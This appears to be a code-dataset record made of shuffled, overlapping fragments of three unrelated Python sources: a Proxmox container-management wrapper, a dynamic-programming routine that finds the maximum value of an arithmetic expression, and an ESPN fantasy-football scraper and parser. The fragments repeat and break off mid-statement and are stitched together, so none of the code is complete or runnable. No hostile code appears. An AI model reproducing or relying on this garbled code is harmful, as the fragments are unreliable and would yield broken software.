vmid=self._vmid) def get_config(self) -> Dict[str,", "self._vmid} return self._api.start_container(**kwargs) def stop(self) -> str: \"\"\" Stop container (unsafely) :return: ID", "self._vmid} if timeout is not None: kwargs[\"timeout\"] = str(timeout) return self._api.reboot_container(**kwargs) def suspend(self)", "[(ProxmoxUser(self._api, el[\"ugid\"].split(\"@\")[0]), el[\"roleid\"]) for el in resp if el[\"path\"] and el[\"type\"] == \"user\"", ".users import ProxmoxUser from typing import Dict, List, Tuple, Any, Union class ProxmoxContainer:", "\"\"\" for user, permission in self.view_permissions(): self.remove_permission(user, permission) def __repr__(self): return f\"<{self.__class__.__name__}: {self._vmid}>\"", "linked might not be supported) (optional, default=True) :return: ID of cloning task \"\"\"", "[] for node in ProxmoxNodeDict(self._api).keys(): resp = self._api.list_containers(node) containers += [ProxmoxContainer(self._api, str(cont[\"vmid\"]), node)", "str(timeout) return self._api.shutdown_container(**kwargs) def reboot(self, timeout: int = None) -> str: \"\"\" Reboot", "tuples of ProxmoxUser objects and string names of roles \"\"\" path = \"/vms/\"", "\"/vms/\" + self._vmid resp = self._api.get_access_control_list() return [(ProxmoxUser(self._api, el[\"ugid\"].split(\"@\")[0]), el[\"roleid\"]) for el in", "kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.stop_container(**kwargs) def shutdown(self, timeout: int =", "not None: if isinstance(newnode, ProxmoxNode): newnode = newnode.id kwargs[\"target\"] = newnode if name", "node @property def id(self) -> str: \"\"\" :return: Unique ID of container (get-only)", "def __eq__(self, other: 'ProxmoxContainer'): return self._vmid == other._vmid and self._node == other._node class", "ProxmoxNode): newnode = newnode.id kwargs[\"target\"] = newnode if name is not None: kwargs[\"hostname\"]", "self._api.reboot_container(**kwargs) def suspend(self) -> str: \"\"\" Suspend container WARNING: doesn't appear in Proxmox", "Container ID :return: None \"\"\" vmid = str(vmid) self._get_containers() self._containers[vmid].delete() def __len__(self): self._get_containers()", ":return: Node on which containers is located (get-only) \"\"\" return ProxmoxNode(self._api, self._node) def", "detailed config :return: Container config in JSON-like format \"\"\" return self._api.get_container_config(node=self._node, vmid=self._vmid) def", "\"full\": '1' if full else '0'} if newnode is not None: if isinstance(newnode,", "Remove all permissions for this container for all users with any role :return:", "True/False \"\"\" config = self.get_status_report() return \"status\" in config.keys() and config[\"status\"] == \"running\"", "= \"/vms/\" + self._vmid if isinstance(user, ProxmoxUser): user = user.id self._api.update_access_control_list(path=path, roles=role, users=user", "def start(self) -> str: \"\"\" Start container :return: ID of task \"\"\" kwargs", "format \"\"\" return self._api.get_container_config(node=self._node, vmid=self._vmid) def running(self) -> bool: \"\"\" Whether container is", "name is not None: kwargs[\"hostname\"] = name return self._api.clone_container(**kwargs) def delete(self) -> str:", "def resume(self) -> str: \"\"\" Resume container WARNING: doesn't appear in Proxmox GUI", "ProxmoxNode, ProxmoxNodeDict from .users import ProxmoxUser from typing import Dict, List, Tuple, Any,", "kwargs = {\"node\": self._node, \"vmid\": self._vmid} if timeout is not None: kwargs[\"timeout\"] =", "a template :return: True/False \"\"\" config = self.get_config() return \"template\" in config.keys() and", "\"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.resume_container(**kwargs) def view_permissions(self) -> List[Tuple[ProxmoxUser,", "'1' if force_stop else '0'} if timeout is not None: kwargs[\"timeout\"] = str(timeout)", "for all users with any role :return: None \"\"\" for user, permission in", "node(self) -> ProxmoxNode: \"\"\" :return: Node on which containers is located (get-only) \"\"\"", "permissions for this container and their roles :return: List of tuples of ProxmoxUser", "return self._containers.keys() def values(self): self._get_containers() return self._containers.values() def items(self): self._get_containers() return self._containers.items() def", "other._vmid and self._node == other._node class ProxmoxContainerDict: def __init__(self, api: APIWrapper): self._api =", "bool: \"\"\" Whether this container is a template :return: True/False \"\"\" config =", "100-999999999) :param newnode: New node ID or ProxmoxNode object (optional) :param name: Name", "of the role :return: None \"\"\" path = \"/vms/\" + self._vmid if isinstance(user,", "default=True) :return: ID of cloning task \"\"\" try: newid = int(newid) except ValueError:", "and el[\"type\"] == \"user\" and el[\"ugid\"].split(\"@\")[1] == \"pve\" and el[\"path\"] == path] def", "return self._api.start_container(**kwargs) def stop(self) -> str: \"\"\" Stop container (unsafely) :return: ID of", "name of the role :return: None \"\"\" path = \"/vms/\" + self._vmid if", ":return: None \"\"\" for user, permission in self.view_permissions(): self.remove_permission(user, permission) def __repr__(self): return", "from typing import Dict, List, Tuple, Any, Union class ProxmoxContainer: def __init__(self, api:", "of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} if timeout is not", "{\"node\": self._node, \"vmid\": self._vmid} return self._api.stop_container(**kwargs) def shutdown(self, timeout: int = None, force_stop:", "newnode is not None: if isinstance(newnode, ProxmoxNode): newnode = newnode.id kwargs[\"target\"] = newnode", "= user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"1\", propagate=\"0\") def remove_all_permissions(self) -> None:", "and their roles :return: List of tuples of ProxmoxUser objects and string names", "node ID or ProxmoxNode object (optional) :param name: Name of new LXC (optional)", "= [] for node in ProxmoxNodeDict(self._api).keys(): resp = self._api.list_containers(node) containers += [ProxmoxContainer(self._api, str(cont[\"vmid\"]),", "\"\"\" Reboot container (safely) :param timeout: Number of seconds to wait (optional) :return:", "is not None: kwargs[\"timeout\"] = str(timeout) return self._api.shutdown_container(**kwargs) def reboot(self, timeout: int =", "appear in Proxmox GUI and probably never works :return: ID of task \"\"\"", "path = \"/vms/\" + self._vmid resp = self._api.get_access_control_list() return [(ProxmoxUser(self._api, el[\"ugid\"].split(\"@\")[0]), el[\"roleid\"]) for", ":param user: User ID or ProxmoxUser object :param role: String name of the", "(safely) :param timeout: Number of seconds to wait (optional) :return: ID of task", "vmid=self._vmid) def get_config(self) -> Dict[str, Any]: \"\"\" Get detailed config :return: Container config" ]
[ "a, b, c, d) MAX = max(MAX, a, b, c, d) return (MIN,", "* b else: assert False def MinAndMax(i, j): MIN = float('inf') MAX =", "op == '-': return a - b elif op == '*': return a", "MAX = float('-inf') for k in range(i, j): a = evalt(M[i][k], M[k +", "op = [dataset[i] for i in range(1, len(dataset), 2)] m, M, n =", "return a + b elif op == '-': return a - b elif", "op[k - 1]) c = evalt(m[i][k], M[k + 1][j], op[k - 1]) d", "+ 1][j], op[k - 1]) MIN = min(MIN, a, b, c, d) MAX", "in range(1, len(dataset), 2)] m, M, n = [], [], len(digits) for i", "j in range(n + 1): m[i].append(0) M[i].append(0) for i in range(1, n +", "b, op): if op == '+': return a + b elif op ==", "a * b else: assert False def MinAndMax(i, j): MIN = float('inf') MAX", "c = evalt(m[i][k], M[k + 1][j], op[k - 1]) d = evalt(m[i][k], m[k", "'+': return a + b elif op == '-': return a - b", "for j in range(n + 1): m[i].append(0) M[i].append(0) for i in range(1, n", "range(1, n + 1): m[i][i], M[i][i] = digits[i - 1], digits[i - 1]", "len(dataset), 2)] op = [dataset[i] for i in range(1, len(dataset), 2)] m, M,", "i in range(0, len(dataset), 2)] op = [dataset[i] for i in range(1, len(dataset),", "= max(MAX, a, b, c, d) return (MIN, MAX) dataset = list(input()) digits", "float('-inf') for k in range(i, j): a = evalt(M[i][k], M[k + 1][j], op[k", "len(digits) for i in range(n + 1): m.append([]) M.append([]) for j in range(n", "- 1], digits[i - 1] for s in range(1, n): for i in", "j): a = evalt(M[i][k], M[k + 1][j], op[k - 1]) b = evalt(M[i][k],", "evalt(m[i][k], m[k + 1][j], op[k - 1]) MIN = min(MIN, a, b, c,", "1][j], op[k - 1]) d = evalt(m[i][k], m[k + 1][j], op[k - 1])", "[], [], len(digits) for i in range(n + 1): m.append([]) M.append([]) for j", "MAX = max(MAX, a, b, c, d) return (MIN, MAX) dataset = list(input())", "= [int(dataset[i]) for i in range(0, len(dataset), 2)] op = [dataset[i] for i", "b else: assert False def MinAndMax(i, j): MIN = float('inf') MAX = float('-inf')", "= i + s m[i][j], M[i][j] = MinAndMax(i, j) # print(m) # print(M)", "range(n + 1): m[i].append(0) M[i].append(0) for i in range(1, n + 1): m[i][i],", "for i in range(1, n + 1): m[i][i], M[i][i] = digits[i - 1],", "MIN = min(MIN, a, b, c, d) MAX = max(MAX, a, b, c,", "n = [], [], len(digits) for i in range(n + 1): m.append([]) M.append([])", "(MIN, MAX) dataset = list(input()) digits = [int(dataset[i]) for i in range(0, len(dataset),", "in range(i, j): a = evalt(M[i][k], M[k + 1][j], op[k - 1]) b", "m.append([]) M.append([]) for j in range(n + 1): m[i].append(0) M[i].append(0) for i in", "d) MAX = max(MAX, a, b, c, d) return (MIN, MAX) dataset =", "b, c, d) return (MIN, MAX) dataset = list(input()) digits = [int(dataset[i]) for", "i in range(1, len(dataset), 2)] m, M, n = [], [], len(digits) for", "assert False def MinAndMax(i, j): MIN = float('inf') MAX = float('-inf') for k", "digits = [int(dataset[i]) for i in range(0, len(dataset), 2)] op = [dataset[i] for", "2)] m, M, n = [], [], len(digits) for i in range(n +", "s): j = i + s m[i][j], M[i][j] = MinAndMax(i, j) # print(m)", "n + 1 - s): j = i + s m[i][j], M[i][j] =", "in range(n + 1): m[i].append(0) M[i].append(0) for i in range(1, n + 1):", "= digits[i - 1], digits[i - 1] for s in range(1, n): for", "1): m.append([]) M.append([]) for j in range(n + 1): m[i].append(0) M[i].append(0) for i", "for s in range(1, n): for i in range(1, n + 1 -", "for i in range(1, n + 1 - s): j = i +", "== '+': return a + b elif op == '-': return a -", "j = i + s m[i][j], M[i][j] = MinAndMax(i, j) # print(m) #", "MAX) dataset = list(input()) digits = [int(dataset[i]) for i in range(0, len(dataset), 2)]", "- b elif op == '*': return a * b else: assert False", "elif op == '-': return a - b elif op == '*': return", "d) return (MIN, MAX) dataset = list(input()) digits = [int(dataset[i]) for i in", "== '*': return a * b else: assert False def MinAndMax(i, j): MIN", "1]) MIN = min(MIN, a, b, c, d) MAX = max(MAX, a, b,", "c, d) return (MIN, MAX) dataset = list(input()) digits = [int(dataset[i]) for i", "MinAndMax(i, j): MIN = float('inf') MAX = float('-inf') for k in range(i, j):", "evalt(M[i][k], m[k + 1][j], op[k - 1]) c = evalt(m[i][k], M[k + 1][j],", "+ 1): m[i][i], M[i][i] = digits[i - 1], digits[i - 1] for s", "- 1]) d = evalt(m[i][k], m[k + 1][j], op[k - 1]) MIN =", "= evalt(m[i][k], m[k + 1][j], op[k - 1]) MIN = min(MIN, a, b,", "digits[i - 1] for s in range(1, n): for i in range(1, n", "in range(1, n + 1 - s): j = i + s m[i][j],", "n + 1): m[i][i], M[i][i] = digits[i - 1], digits[i - 1] for", "return a - b elif op == '*': return a * b else:", "for i in range(0, len(dataset), 2)] op = [dataset[i] for i in range(1,", "range(n + 1): m.append([]) M.append([]) for j in range(n + 1): m[i].append(0) M[i].append(0)", "Uses python3 def evalt(a, b, op): if op == '+': return a +", "n): for i in range(1, n + 1 - s): j = i", "MIN = float('inf') MAX = float('-inf') for k in range(i, j): a =", "a = evalt(M[i][k], M[k + 1][j], op[k - 1]) b = evalt(M[i][k], m[k", "m[i][i], M[i][i] = digits[i - 1], digits[i - 1] for s in range(1,", "b = evalt(M[i][k], m[k + 1][j], op[k - 1]) c = evalt(m[i][k], M[k", "- s): j = i + s m[i][j], M[i][j] = MinAndMax(i, j) #", "evalt(a, b, op): if op == '+': return a + b elif op", "op == '*': return a * b else: assert False def MinAndMax(i, j):", "+ 1 - s): j = i + s m[i][j], M[i][j] = MinAndMax(i,", "a, b, c, d) return (MIN, MAX) dataset = list(input()) digits = [int(dataset[i])", "2)] op = [dataset[i] for i in range(1, len(dataset), 2)] m, M, n", "M[k + 1][j], op[k - 1]) b = evalt(M[i][k], m[k + 1][j], op[k", "op[k - 1]) d = evalt(m[i][k], m[k + 1][j], op[k - 1]) MIN", "range(0, len(dataset), 2)] op = [dataset[i] for i in range(1, len(dataset), 2)] m,", "i in range(n + 1): m.append([]) M.append([]) for j in range(n + 1):", "M[i].append(0) for i in range(1, n + 1): m[i][i], M[i][i] = digits[i -", "range(1, len(dataset), 2)] m, M, n = [], [], len(digits) for i in", "digits[i - 1], digits[i - 1] for s in range(1, n): for i", "+ b elif op == '-': return a - b elif op ==", "for i in range(1, len(dataset), 2)] m, M, n = [], [], len(digits)", "1 - s): j = i + s m[i][j], M[i][j] = MinAndMax(i, j)", "= evalt(M[i][k], m[k + 1][j], op[k - 1]) c = evalt(m[i][k], M[k +", "i in range(1, n + 1): m[i][i], M[i][i] = digits[i - 1], digits[i", "range(i, j): a = evalt(M[i][k], M[k + 1][j], op[k - 1]) b =", "M[i][i] = digits[i - 1], digits[i - 1] for s in range(1, n):", "[dataset[i] for i in range(1, len(dataset), 2)] m, M, n = [], [],", "- 1]) b = evalt(M[i][k], m[k + 1][j], op[k - 1]) c =", "m, M, n = [], [], len(digits) for i in range(n + 1):", "b, c, d) MAX = max(MAX, a, b, c, d) return (MIN, MAX)", "float('inf') MAX = float('-inf') for k in range(i, j): a = evalt(M[i][k], M[k", "- 1]) MIN = min(MIN, a, b, c, d) MAX = max(MAX, a,", "i + s m[i][j], M[i][j] = MinAndMax(i, j) # print(m) # print(M) print(M[1][n])", "list(input()) digits = [int(dataset[i]) for i in range(0, len(dataset), 2)] op = [dataset[i]", "+ 1][j], op[k - 1]) c = evalt(m[i][k], M[k + 1][j], op[k -", "in range(0, len(dataset), 2)] op = [dataset[i] for i in range(1, len(dataset), 2)]", "min(MIN, a, b, c, d) MAX = max(MAX, a, b, c, d) return", "m[i].append(0) M[i].append(0) for i in range(1, n + 1): m[i][i], M[i][i] = digits[i", "= evalt(M[i][k], M[k + 1][j], op[k - 1]) b = evalt(M[i][k], m[k +", "1): m[i][i], M[i][i] = digits[i - 1], digits[i - 1] for s in", "elif op == '*': return a * b else: assert False def MinAndMax(i,", "j): MIN = float('inf') MAX = float('-inf') for k in range(i, j): a", "1][j], op[k - 1]) MIN = min(MIN, a, b, c, d) MAX =", "for i in range(n + 1): m.append([]) M.append([]) for j in range(n +", "dataset = list(input()) digits = [int(dataset[i]) for i in range(0, len(dataset), 2)] op", "= [dataset[i] for i in range(1, len(dataset), 2)] m, M, n = [],", "b elif op == '*': return a * b else: assert False def", "b elif op == '-': return a - b elif op == '*':", "op[k - 1]) b = evalt(M[i][k], m[k + 1][j], op[k - 1]) c", "evalt(M[i][k], M[k + 1][j], op[k - 1]) b = evalt(M[i][k], m[k + 1][j],", "== '-': return a - b elif op == '*': return a *", "= float('inf') MAX = float('-inf') for k in range(i, j): a = evalt(M[i][k],", "False def MinAndMax(i, j): MIN = float('inf') MAX = float('-inf') for k in", "1]) c = evalt(m[i][k], M[k + 1][j], op[k - 1]) d = evalt(m[i][k],", "m[k + 1][j], op[k - 1]) MIN = min(MIN, a, b, c, d)", "else: assert False def MinAndMax(i, j): MIN = float('inf') MAX = float('-inf') for", "[int(dataset[i]) for i in range(0, len(dataset), 2)] op = [dataset[i] for i in", "+ 1): m.append([]) M.append([]) for j in range(n + 1): m[i].append(0) M[i].append(0) for", "1]) d = evalt(m[i][k], m[k + 1][j], op[k - 1]) MIN = min(MIN,", "'*': return a * b else: assert False def MinAndMax(i, j): MIN =", "M, n = [], [], len(digits) for i in range(n + 1): m.append([])", "a - b elif op == '*': return a * b else: assert", "op[k - 1]) MIN = min(MIN, a, b, c, d) MAX = max(MAX,", "M[k + 1][j], op[k - 1]) d = evalt(m[i][k], m[k + 1][j], op[k", "i in range(1, n + 1 - s): j = i + s", "1][j], op[k - 1]) c = evalt(m[i][k], M[k + 1][j], op[k - 1])", "in range(n + 1): m.append([]) M.append([]) for j in range(n + 1): m[i].append(0)", "op == '+': return a + b elif op == '-': return a", "1] for s in range(1, n): for i in range(1, n + 1", "+ 1][j], op[k - 1]) d = evalt(m[i][k], m[k + 1][j], op[k -", "[], len(digits) for i in range(n + 1): m.append([]) M.append([]) for j in", "in range(1, n + 1): m[i][i], M[i][i] = digits[i - 1], digits[i -", "s in range(1, n): for i in range(1, n + 1 - s):", "1]) b = evalt(M[i][k], m[k + 1][j], op[k - 1]) c = evalt(m[i][k],", "range(1, n + 1 - s): j = i + s m[i][j], M[i][j]", "+ 1): m[i].append(0) M[i].append(0) for i in range(1, n + 1): m[i][i], M[i][i]", "return (MIN, MAX) dataset = list(input()) digits = [int(dataset[i]) for i in range(0,", "evalt(m[i][k], M[k + 1][j], op[k - 1]) d = evalt(m[i][k], m[k + 1][j],", "def MinAndMax(i, j): MIN = float('inf') MAX = float('-inf') for k in range(i,", "k in range(i, j): a = evalt(M[i][k], M[k + 1][j], op[k - 1])", "d = evalt(m[i][k], m[k + 1][j], op[k - 1]) MIN = min(MIN, a,", "op): if op == '+': return a + b elif op == '-':", "range(1, n): for i in range(1, n + 1 - s): j =", "- 1]) c = evalt(m[i][k], M[k + 1][j], op[k - 1]) d =", "= min(MIN, a, b, c, d) MAX = max(MAX, a, b, c, d)", "python3 def evalt(a, b, op): if op == '+': return a + b", "+ 1][j], op[k - 1]) b = evalt(M[i][k], m[k + 1][j], op[k -", "return a * b else: assert False def MinAndMax(i, j): MIN = float('inf')", "def evalt(a, b, op): if op == '+': return a + b elif", "len(dataset), 2)] m, M, n = [], [], len(digits) for i in range(n", "max(MAX, a, b, c, d) return (MIN, MAX) dataset = list(input()) digits =", "a + b elif op == '-': return a - b elif op", "= list(input()) digits = [int(dataset[i]) for i in range(0, len(dataset), 2)] op =", "- 1] for s in range(1, n): for i in range(1, n +", "if op == '+': return a + b elif op == '-': return", "= [], [], len(digits) for i in range(n + 1): m.append([]) M.append([]) for", "M.append([]) for j in range(n + 1): m[i].append(0) M[i].append(0) for i in range(1,", "m[k + 1][j], op[k - 1]) c = evalt(m[i][k], M[k + 1][j], op[k", "c, d) MAX = max(MAX, a, b, c, d) return (MIN, MAX) dataset", "= float('-inf') for k in range(i, j): a = evalt(M[i][k], M[k + 1][j],", "in range(1, n): for i in range(1, n + 1 - s): j", "# Uses python3 def evalt(a, b, op): if op == '+': return a", "1], digits[i - 1] for s in range(1, n): for i in range(1,", "for k in range(i, j): a = evalt(M[i][k], M[k + 1][j], op[k -", "1][j], op[k - 1]) b = evalt(M[i][k], m[k + 1][j], op[k - 1])", "= evalt(m[i][k], M[k + 1][j], op[k - 1]) d = evalt(m[i][k], m[k +", "'-': return a - b elif op == '*': return a * b", "1): m[i].append(0) M[i].append(0) for i in range(1, n + 1): m[i][i], M[i][i] =" ]
[ "str 'DEN', 'BUF', etc. Returns: HTML string \"\"\" url = f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\" return self.get(url,", "Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_k(content):", "= dict(zip(headers, tds)) # name, team, position nametd = row.find(\"td\", {\"id\": re.compile(r\"playername\")}) for", "(str): 'qb', 'wr', etc. Returns: str: HTML TODO: rework for new URL \"\"\"", "str \"\"\" url = \"http://www.espn.com/nfl/players?position={}&league=nfl\" return self.get(url.format(pos), encoding=\"latin1\") def projections(self, pos, season_year=None, week=0,", "player[\"source_player_position\"] = tds[2].text player[\"source_player_name\"] = link.text player[\"source_player_id\"] = link[\"href\"].split(\"/\")[-2] players.append(player) except ValueError: pass", "max_offset.get(pos): raise ValueError(\"invalid offset {}\".format(offset)) if offset % 40 > 0: raise ValueError(\"invalid", "6, \"dst\": 16, \"k\": 17} max_offset = {\"qb\": 120, \"rb\": 240, \"wr\": 360,", "rework for new URL \"\"\" poscode = {\"qb\": 0, \"rb\": 2, \"wr\": 4,", "return players @staticmethod def players_position(content, pos): \"\"\" Parses page of ESPN players by", "other names/ids \"\"\" def __init__(self, source_name=\"espn\"): \"\"\" Args: source_name(str): either 'espn' or 'espn_fantasy'", "mostly about managing fantasy teams # NOTE: trouble accessing data in offseason #", "page Args: content (str): HTML Returns: list: of dict \"\"\" results = []", "def _val(val): \"\"\" Converts non-numeric value to numeric 0 Args: val: Returns: number", "{ \"scoringPeriodId\": week, \"seasonId\": season_year, \"slotCategoryId\": position, } return self.get(url, params=params) class Parser:", "\"te\", \"flex\"]: headers = [ \"pass_att\", \"pass_cmp\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\",", "= link.text player[\"source_player_id\"] = link[\"href\"].split(\"/\")[-2] players.append(player) except ValueError: pass return players @staticmethod def", "0, \"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\": 16, \"k\": 17} max_offset =", "have attempts/completions in one column so have to remove & split vals =", "basic fantasy data # espn_fantasy is mostly about managing fantasy teams # NOTE:", "= Scraper(cache_name=cache_name) if parser: self._p = parser else: self._p = Parser() def adp(self,", "Args: content (str): HTML Returns: list: of dict \"\"\" # TODO: adapt for", "'espn' or 'espn_fantasy' \"\"\" super().__init__() self.source_name = source_name if __name__ == \"__main__\": pass", "\"pass_att\", \"pass_cmp\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec\", \"rec_yds\", \"rec_td\", \"fantasy_points_ppr\", ]", "dict \"\"\" results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\",", "adp(self, season_year): \"\"\" Gets season ADP data Args: season_year(int): 2018, 2019, etc. Returns:", "player = dict(zip(headers, tds)) # name, team, position nametd = row.find(\"td\", {\"id\": re.compile(r\"playername\")})", "24: \"LAC\", 25: \"SF\", 26: \"Sea\", 27: \"TB\", 28: \"Wsh\", 29: \"Car\", 30:", "Gets weekly fantasy scoring page Args: season_year (int): 2017, 2016, etc. week (int):", "player[ \"source_player_position\" ] = child.string.split()[1:3] elif isinstance(child, Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"] =", "players = [] soup = BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): class_matches =", "3: \"Chi\", 4: \"Cin\", 5: \"Cle\", 6: \"Dal\", 7: \"Den\", 8: \"Det\", 9:", "results @staticmethod def weekly_scoring_dst(content): \"\"\" Parses weekly scoring page for dst Args: content(str):", "\"rec_rec\", \"rec_yds\", \"rec_td\", \"rec_tar\", \"tpc\", \"fumble\", \"misc_td\", \"fpts\", ] soup = BeautifulSoup(content, \"lxml\")", "adp(self, season_year): \"\"\" Gets adp data Args: season_year(int): 2019, etc. Returns: dict: parsed", "by position Args: pos(str): qb, rb, wr, te, k, etc. Returns: str \"\"\"", "of dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") for row in", "2019, etc. Returns: list: of dict \"\"\" content = self._s.adp(season_year) return self._p.adp(content) class", "season_year): \"\"\" Gets adp data Args: season_year(int): 2019, etc. Returns: dict: parsed JSON", "in tl_wanted} for scoring_type in [\"PPR\", \"STANDARD\"]: for rank_type in [\"rank\", \"auctionValue\"]: key", "[ \"qb\", \"rb\", \"wr\", \"te\", \"dst\", \"d/st\", \"k\", \"QB\", \"RB\", \"WR\", \"TE\", \"K\",", "Gets adp data Args: season_year(int): 2019, etc. Returns: dict: parsed JSON \"\"\" url", "string TODO: revise based on new URL \"\"\" pos = pos.lower() slot_categories =", "dict \"\"\" content = self._s.adp(season_year) return self._p.adp(content) class Xref(Site): \"\"\" Cross-reference source players", "[] soup = BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): class_matches = set([\"oddrow\", \"evenrow\"])", "tds[2].text player[\"source_player_name\"] = link.text player[\"source_player_id\"] = link[\"href\"].split(\"/\")[-2] players.append(player) except ValueError: pass return players", "slot_categories[pos], \"startIndex\": offset, \"seasonId\": season_year, } else: params = {\"slotCategoryId\": slot_categories[pos], \"startIndex\": offset}", "by position Args: pos: str qb, rb, wr, te, k, etc. season_year: int", "content: Returns: list of dict \"\"\" vals = [] for item in content[\"players\"]:", "espn football data # this does include some basic fantasy data # espn_fantasy", "rank_type try: api_player[key] = item[\"player\"][\"draftRanksByRankType\"][ scoring_type ][rank_type] except KeyError: api_player[key] = None vals.append(api_player)", "{\"id\": re.compile(r\"plyr\")}): tds = [td.text for td in row.find_all(\"td\", class_=\"playertableStat\")] if tds: player", "Returns: list: of dict \"\"\" # TODO: adapt for kicker results = []", "valid and uppercase Args: pos(str): Returns: str \"\"\" if pos in [ \"qb\",", "in soup.find_all(\"tr\"): link = row.find(\"a\", {\"href\": re.compile(r\"/nfl/player/_/id/\")}) try: player = {\"source\": \"espn\"} tds", "scoring page for kickers Args: content (str): HTML Returns: list: of dict \"\"\"", "name/team/pos link, navstr = list(tds[1].children)[0:2] player[\"source_player_name\"] = link.text player[\"source_player_team\"], player[ \"source_player_position\" ] =", "etc. Returns: HTML string TODO: revise based on new URL \"\"\" pos =", "\"te\": 160, \"dst\": 0, \"k\": 40} if pos not in slot_categories.keys(): raise ValueError(\"invalid", "} return self.get(url, params=params) class Parser: \"\"\" Parse ESPN.com for football stats \"\"\"", "row.find(\"a\", {\"href\": re.compile(r\"/nfl/player/_/id/\")}) try: player = {\"source\": \"espn\"} tds = row.find_all(\"td\") if len(tds)", "dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") if pos.lower() in [\"qb\",", "\"k\": 40} if pos not in slot_categories.keys(): raise ValueError(\"invalid pos {}\".format(pos)) if offset", "] = child.string.split()[1:3] elif isinstance(child, Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player)", "in [\"PPR\", \"STANDARD\"]: for rank_type in [\"rank\", \"auctionValue\"]: key = scoring_type.lower() + \"_\"", "Returns: HTML string TODO: revise based on new URL \"\"\" pos = pos.lower()", "if match: player[\"source_team_code\"] = match.group(1) # tds[2]: <td>Arkansas</td> player[\"college\"] = tds[2].text # add", "\"\"\" Gets season ADP data Args: season_year(int): 2018, 2019, etc. Returns: list: of", "18: \"NO\", 19: \"NYG\", 20: \"NYJ\", 21: \"Phi\", 22: \"Ari\", 23: \"Pit\", 24:", "\"wr\": 360, \"te\": 160, \"dst\": 0, \"k\": 40} if pos not in slot_categories.keys():", "+ vals): player[header] = val players.append(player) elif pos.lower() == \"k\": for row in", "adapt for dst results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\",", "@staticmethod def players_position(content, pos): \"\"\" Parses page of ESPN players by position Args:", "page of ESPN players by position Args: content: pos: Returns: list: of dict", "\"Jax\", 33: \"Bal\", 34: \"Hou\", } class Scraper(RequestScraper): \"\"\" Scrape ESPN.com for football", "in content[\"players\"]: tl_wanted = [ \"defaultPositionId\", \"firstName\", \"id\", \"lastName\", \"proTeamId\", ] api_player =", "9: \"GB\", 10: \"Ten\", 11: \"Ind\", 12: \"KC\", 13: \"Oak\", 14: \"LAR\", 15:", "= row.find_all(\"td\") if len(tds) != 8: continue player[\"source_player_position\"] = tds[2].text player[\"source_player_name\"] = link.text", "season_year, } else: params = {\"slotCategoryId\": slot_categories[pos], \"startIndex\": offset} if week: params[\"scoringPeriodId\"] =", "in [\"qb\", \"rb\", \"wr\", \"te\", \"flex\"]: headers = [ \"pass_att\", \"pass_cmp\", \"pass_yds\", \"pass_td\",", "# name/jax/jacksonville-jaguars\"><NAME></a></td> player[\"source_team_name\"] = tds[1].text link = row.find(\"a\", {\"href\": re.compile(r\"/team/_/name\")}) if link: match", "\"espn\"} tds = row.find_all(\"td\") if len(tds) != 8: continue player[\"source_player_position\"] = tds[2].text player[\"source_player_name\"]", "Returns: list of dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") if", "ValueError: pass return players @staticmethod def weekly_scoring(content): \"\"\" Parses weekly scoring page Args:", "for row in soup.find_all(\"tr\"): link = row.find(\"a\", {\"href\": re.compile(r\"/nfl/player/_/id/\")}) try: player = {\"source\":", "# tds[0]: rank player[\"source_position_rank\"] = tds[0].text # tds[1]: name/team/pos link, navstr = list(tds[1].children)[0:2]", "= parser else: self._p = Parser() def adp(self, season_year): \"\"\" Gets season ADP", "vals = [self._val(td.text) for td in tds[3:]] for header, val in zip(headers, tds[2].text.split(\"/\")", "pos): \"\"\" Parses page of ESPN players by position Args: content: pos: Returns:", "\"NYG\", 20: \"NYJ\", 21: \"Phi\", 22: \"Ari\", 23: \"Pit\", 24: \"LAC\", 25: \"SF\",", "child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results class Agent: \"\"\" Combines common scraping/parsing", "= {\"source\": \"espn\", \"source_player_position\": pos} tds = row.find_all(\"td\") # tds[0]: <a href=\"http://www.espn.com/nfl/player/_/id/ #", "week=0, offset=0): \"\"\" Gets page with projections by position Args: pos: str qb,", "+ rank_type try: api_player[key] = item[\"player\"][\"draftRanksByRankType\"][ scoring_type ][rank_type] except KeyError: api_player[key] = None", "= { 1: \"Atl\", 2: \"Buf\", 3: \"Chi\", 4: \"Cin\", 5: \"Cle\", 6:", "\"Wsh\", 29: \"Car\", 30: \"Jax\", 33: \"Bal\", 34: \"Hou\", } class Scraper(RequestScraper): \"\"\"", "position, } return self.get(url, params=params) class Parser: \"\"\" Parse ESPN.com for football stats", "week: int 1, 2, 3 offset: int 0, 40, 80, etc. Returns: HTML", "def team_roster(content): \"\"\" Parses team roster page into list of player dict Args:", "weekly fantasy scoring page Args: season_year (int): 2017, 2016, etc. week (int): 1", "with other names/ids \"\"\" def __init__(self, source_name=\"espn\"): \"\"\" Args: source_name(str): either 'espn' or", "for item in content[\"players\"]: tl_wanted = [ \"defaultPositionId\", \"firstName\", \"id\", \"lastName\", \"proTeamId\", ]", "HTML string Returns: list of dict \"\"\" players = [] soup = BeautifulSoup(content,", "parser: self._p = parser else: self._p = Parser() def adp(self, season_year): \"\"\" Gets", "not in slot_categories.keys(): raise ValueError(\"invalid pos {}\".format(pos)) if offset > max_offset.get(pos): raise ValueError(\"invalid", "4: \"Cin\", 5: \"Cle\", 6: \"Dal\", 7: \"Den\", 8: 